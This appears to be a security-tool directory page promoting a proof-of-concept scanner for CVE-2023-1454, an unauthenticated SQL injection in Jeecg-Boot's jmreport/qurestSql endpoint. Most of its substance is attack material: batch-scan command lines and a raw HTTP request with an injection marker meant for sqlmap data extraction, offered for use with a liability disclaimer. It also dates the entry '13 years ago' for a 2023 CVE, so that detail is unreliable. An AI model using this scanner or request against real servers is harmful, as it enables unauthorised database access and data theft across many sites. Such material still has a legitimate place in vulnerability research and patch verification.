Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-1454 — jmreport/qurestSql 未授权SQL注入批量扫描poc | Kitploit
Tools/GitHubGitHub/cjybao/cve-2023-1454
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubcjybao/cve-2023-1454

CVE-2023-1454

jmreport/qurestSql 未授权SQL注入批量扫描poc

View Repository
13 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2023-1454

jmreport/qurestSql Unauthorized SQL injection batch scanning poc Jeecg-Boot is a rapid development platform based on Spring Boot and Jeecg-Boot-Plus. The latest jeecg-boot 3.5.0 has been exposed to multiple SQL injection vulnerabilities.

Tool Usage

python3 CVE-2023-1454-scan.py -u http://127.0.0.1:1111 Single URL test

python3 CVE-2023-1454-scan.py -f url.txt Batch scanning

After scanning, a vuln.txt file containing vulnerable URLs will be generated in the current directory.

poc:

exp:

Save the packet as txt and use sqlmap to obtain data

root@kitploit:~
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: xxx.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2088.112 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 129

{"apiSelectId":"1290104038414721025",
"id":"1*"}

Disclaimer

Any direct or indirect consequences and losses caused by the dissemination or use of the information provided in this document shall be borne by the user himself, and the author shall not assume any responsibility.

Download Tool